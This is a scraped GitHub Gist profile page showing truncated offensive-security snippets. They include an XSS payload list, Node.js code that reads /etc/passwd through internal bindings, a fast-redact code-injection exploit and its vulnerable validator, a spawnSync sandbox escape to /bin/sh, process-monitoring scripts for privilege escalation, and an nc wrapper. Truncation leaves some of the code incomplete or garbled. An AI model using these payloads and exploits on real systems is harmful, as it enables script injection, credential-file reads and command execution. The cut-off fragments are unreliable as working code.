Skip to content

Instantly share code, notes, and snippets.

root@localhost ~#

Francesco Soncina phra

root@localhost ~#
View GitHub Profile
View exploit.cpp
This file has been truncated, but you can view the full file.
#include <windows.h>
#include <iostream>
#include <msi.h>
#include <conio.h>
#include <shlobj.h>
#include <pathcch.h>
#include <shlwapi.h>
#include <tchar.h>
#pragma comment(lib, "shlwapi.lib")
phra /
Created Jun 28, 2018 — forked from padovah4ck/
ippsec process monitor script
# Loop by line
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
while true; do
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
phra /
Created Jun 2, 2018
Detect cronjobs without reading permission
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process")
sleep 1
View xss-top500.txt
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
phra / read-passwd.js
Created May 29, 2018
read /etc/passwd without `fs` Node.js module
View read-passwd.js
const buffer = Buffer.allocUnsafe(8192)
process.binding('fs').read(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096)
phra / fast-redact.exploit.js
Created May 29, 2018
fast-redact exploit
View fast-redact.exploit.js
const fastRedact = require('fast-redact')
const fauxRequest = {
headers: {
host: '',
cookie: `oh oh we don't want this exposed in logs in etc.`,
referer: `if we're cool maybe we'll even redact this`
const redact = fastRedact({
paths: ['headers.cookie', `a\n&& (function(){
phra / validator.js
Created May 29, 2018
fast-redact vulnerable validator
View validator.js
try {
if (//.test(s)) throw Error()
const proxy = new Proxy({}, {get: () => proxy, set: () => { throw Error() }})
const expr = s.replace(/^\*/, '〇').replace(/\.\*/g, '.〇').replace(/\[\*\]/g, '[〇]')
if (/\/\*/.test(expr)) throw Error()
/* eslint-disable-next-line */
new Script(`
if ([o.${expr}].length !== 1) throw Error()
`).runInNewContext({o: proxy, : null})
View spawnSync.js
// Source:
// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),{const g=[c].concat(b).join(' ');typeof'string'?'/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}
// Defines spawnSync, the function that will do the actual spawning
spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])
# nca - nc wrapper by SNADO team
# Requires: expect, nc and optionally tmux
set LISTEN false
set ADDR ""
set PORT 0
set TMUX false
set UDP ""
set KILL true
View chooseUser.js
const GREEN = 'green'
const YELLOW = 'yellow'
const RED = 'red'
const GREEN_WEIGHT = .2
const YELLOW_WEIGHT = .3
const RED_WEIGHT = .5
const people = [
{ user: 'user1', grade: GREEN },